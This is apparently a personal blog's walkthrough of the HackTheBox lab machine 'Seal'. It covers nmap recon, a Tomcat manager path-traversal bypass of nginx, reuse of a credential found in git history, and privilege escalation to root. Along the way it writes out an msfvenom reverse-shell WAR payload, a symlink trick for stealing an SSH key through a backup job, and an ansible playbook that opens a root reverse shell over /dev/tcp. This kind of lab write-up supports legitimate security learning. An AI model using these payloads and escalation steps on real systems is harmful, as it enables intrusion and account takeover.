dennis@home:~$

Archive

About

RSS

    Seal HackTheBox

    Recon

    nmap -sC -sV -Ao nmap 10.10.10.250

    Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-02 08:33 CEST
Nmap scan report for 10.10.10.250
Host is up (0.023s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
| tls-nextprotoneg:
|_  http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http-proxy
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 401 Unauthorized
|     Date: Fri, 02 Sep 2022 06:32:57 GMT
|     Set-Cookie: JSESSIONID=node01j0kvq70qbpqj11e6pkvdnh6s32.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest:
|     HTTP/1.1 401 Unauthorized
|     Date: Fri, 02 Sep 2022 06:32:56 GMT
|     Set-Cookie: JSESSIONID=node05fxtqecve3hh15vos2gljmegx0.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Fri, 02 Sep 2022 06:32:57 GMT
|     Set-Cookie: JSESSIONID=node0sh26ekxv2537kx25ph8zd1m1.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck:
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest:
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4:
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5:
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=9/2%Time=6311A3A4%P=x86_64-pc-linux-gnu%r(Get
SF:Request,F4,"HTTP/1\.1\x20401\x20Unauthorized\r\nDate:\x20Fri,\x2002\x20
SF:Sep\x202022\x2006:32:56\x20GMT\r\nSet-Cookie:\x20JSESSIONID=node05fxtqe
SF:cve3hh15vos2gljmegx0\.node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Thu,
SF:\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nContent-Type:\x20text/html;
SF:charset=utf-8\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,106,"HTTP
SF:/1\.1\x20200\x20OK\r\nDate:\x20Fri,\x2002\x20Sep\x202022\x2006:32:57\x2
SF:0GMT\r\nSet-Cookie:\x20JSESSIONID=node0sh26ekxv2537kx25ph8zd1m1\.node0;
SF:\x20Path=/;\x20HttpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2000:
SF:00:00\x20GMT\r\nContent-Type:\x20text/html;charset=utf-8\r\nAllow:\x20G
SF:ET,HEAD,POST,OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,AD
SF:,"HTTP/1\.1\x20505\x20Unknown\x20Version\r\nContent-Type:\x20text/html;
SF:charset=iso-8859-1\r\nContent-Length:\x2058\r\nConnection:\x20close\r\n
SF:\r\n<h1>Bad\x20Message\x20505</h1><pre>reason:\x20Unknown\x20Version</p
SF:re>")%r(FourOhFourRequest,F5,"HTTP/1\.1\x20401\x20Unauthorized\r\nDate:
SF:\x20Fri,\x2002\x20Sep\x202022\x2006:32:57\x20GMT\r\nSet-Cookie:\x20JSES
SF:SIONID=node01j0kvq70qbpqj11e6pkvdnh6s32\.node0;\x20Path=/;\x20HttpOnly\
SF:r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nContent-
SF:Type:\x20text/html;charset=utf-8\r\nContent-Length:\x200\r\n\r\n")%r(So
SF:cks5,C3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x5\r\nConten
SF:t-Type:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2069\r\nCon
SF:nection:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20
SF:Illegal\x20character\x20CNTL=0x5</pre>")%r(Socks4,C3,"HTTP/1\.1\x20400\
SF:x20Illegal\x20character\x20CNTL=0x4\r\nContent-Type:\x20text/html;chars
SF:et=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\n\r\n<
SF:h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20character\x20CN
SF:TL=0x4</pre>")%r(RPCCheck,C7,"HTTP/1\.1\x20400\x20Illegal\x20character\
SF:x20OTEXT=0x80\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nConte
SF:nt-Length:\x2071\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x204
SF:00</h1><pre>reason:\x20Illegal\x20character\x20OTEXT=0x80</pre>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.32 seconds

    Interpretation

    There are three open ports: 22, 443 and 8080.

    Port 443

    The website on port 433 seems to be not vulnerable. There are two input possibilities but basic xss, sqli testing reveals nothing interesting.

    Port 8080

    The application on port 8080 is GitBucket. Basic or default credentials are not wirking to login so creating a new account seems to be the way to go. We have access to two repositories. In the tomcat folder in the tomcat-users.xml there is no user entry but the git history reveals a deleted tomcat user with the credentials: tomcat:42MrHBf*z8{Z%. This password can be reused for the GitBucket service as user luis but this had no further impact. More looking around reveals that there is a nginx reverse proxy running which blocks requests to for example /manager/html

    Path traversal

    This combination of tomcat and nginx is most often vulnerable to a path traversal attack as explained here. 10.10.10.250/manager;name=dennis/html/ did the trick because /manager;name=dennis/html doesn’t match the pattern /manager/html checked by nginx so it forwards the request to the tomcat. The application server normalizes the reqest and throws the ;name=dennis-part away so tomcat sees only /manager/html. For the managersite the previous found credentials are working so we have access to the admin panel.

    Exploit

    Creating an exploit which we can upload to the tomcat.

    msfvenom -p java/shell_reverse_tcp lhost=10.10.14.4 lport=4242 -f war -o rev.war7

    Upload the war-File to the adminpanel and deploy it to the tomcat.

    Notes to deploying to tomcat

    1. Logically the request have to be intercepted with burpsuite because the deploy-Button has links to /manager/html/upload... which is blocked by nginx. So the path traversal should again be applied.
    2. I had to add the host name to my /etc/hosts-file but I don’t know why.

    Luis Shell

    From tomcat user we have to get shell as luis. Therefore we look around and find an ansible playbook. This playbook under /opt/backups/playbook creates backups from /var/lib/tomcat9/webapps/ROOT/admin/dashboard. Luckily the uploads directory is writable by everybody. We have to symlink to home-directory from luis to that directory so next time a backup is created the home directory is also in this backup.

    ln -s /home/luis/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
tar zxf backup-2021-09-04-07\:59\:32.gz --force-local
cd luis/.ssh

    We can get the id_rsa file from luis and connect via ssh with his private key. Don’t forget to set the wright permissions to the keyfile chmod 600 key.luis

    ssh -i key.luis luis@seal.htb

    root

    To list the commands which user luis can run without password run: sudo -l. According to the result (ALL) NOPASSWD: /usr/bin/ansible-playbook * it seems like every user can run an ansible-playbook as root without a password.

    ansible commands

    Looking around I found an article whcich describes how to weaponize the ansible-playbook and build a reverse shell with it.

    - hosts: localhost
  tasks:
  - name: rev
    shell: bash -c 'bash -i >& /dev/tcp/10.10.14.18/4242 0>&1'

    Run this .yml file with sudo ansible-playbook run.yml and start a listener on your maschine.